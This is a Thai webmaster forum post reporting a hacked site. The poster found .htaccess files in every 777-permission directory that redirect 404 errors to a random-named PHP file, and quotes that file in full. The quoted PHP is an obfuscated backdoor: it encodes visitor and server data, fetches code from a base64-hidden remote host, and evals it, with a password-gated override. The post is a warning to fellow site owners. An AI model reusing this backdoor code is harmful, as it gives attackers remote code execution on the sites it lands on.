เจอเรื่องแปลกๆ ตอนเข้า GG web master tool

[g-ji]

วันนี้ก็เข้า web master tool ตามปกติ ที่จะเข้าวันละ 1 ครั้งอยู่แล้ว เพื่อตรวจเช็ค error ต่างๆ บน site map และเช็คอื่นๆ

แต่วันนี้เจอเรื่องแปลกมาก (ตามรูป)



ที่วงแดงๆ ไว้ 

จริงๆ แล้วไม่ทราบว่ามันคืออะไร ตอนแรกเห็น WP ก็นึกว่าเป็น cache ของระบบ (ใน config.php ใช้คำสั่ง define cache true ไว้) แต่พอมองดูดีๆ

เฮ้ย?? มันไป แคชบ้าอะไรในธีมนั้น แถมนามสกุล .html  (แถมอยู่ใน dir image ซะงั้น)

เลยเปิด fire zilla เข้าไปดูอย่างด่วนเลย ก็พอว่า

ทุก dir ที่ ตั้ง permission 777 ไว้
จะมี .htaccess

โค้ด เลือก ขยาย

Options -MultiViews
ErrorDocument 404 //dir/path/to/235984.php

Options -MultiViews
ErrorDocument 404 /dir/path/to/235984.php

Options -MultiViews
ErrorDocument 404 /dir/path/to/235984.php

อยู่ dir ไหนก็จะมี ชื่อพาธตามนั้นอ่ะ

แล้วใน ไฟล์ php (สุ่มเลข) ก็จะมีโค้ดตามนี้

โค้ด เลือก ขยาย

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6b5c989d96a8617d098f67be813b4c3b") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

(มันคือไรฟะ สั่งโหลดอะไรละนั้น เทพ php ช่วยบอกที )

พอลองไล่ๆ ดู มีทุก dir ที่ 777 ไว้ทุก dir เลย

ตอนแรกคิดว่ามันคงเป็น แคชอ่ะนะ แต่พอดู config.php ของอีกเว็บนึง มันไม่ได้ตั้งไว้... (งานเข้าละไง)

เลย ลบทิ้งหมด ไม่สนว่ามันจะเป็นไฟล์อะไรแล้ว

เข้าไปลบที่หน้า control panel นะ ทุก dir ที่ 777 มีการแก้ไขเมื่อวันที่ 2 เมษายน ที่ผ่านมานี่เอง 

ก็เลยมาบอกเพื่อนๆ กันสักนิด ควรจะตรวจสอบ dir ที่ 777 ด้วยนะจ้า ไฟล์ไหนไม่มั่นใจลบโลด เพื่อความปลอดภัยของเว็บ

ไม่ใช่เฉพาะ WP นะ ใช้ cms ตัวอื่น หรือ เขียนเอง ก็ตรวจสอบดูบ้างนะ

ตอนนี้เลยเปลี่ยน permisson หมดแล้ว รอดูอีกสัก 2-3 วัน

มันมาจากไหนหว่า ไ่ม่เข้าใจ

[smapan]

  ขอบคุณที่มาเตือนครับ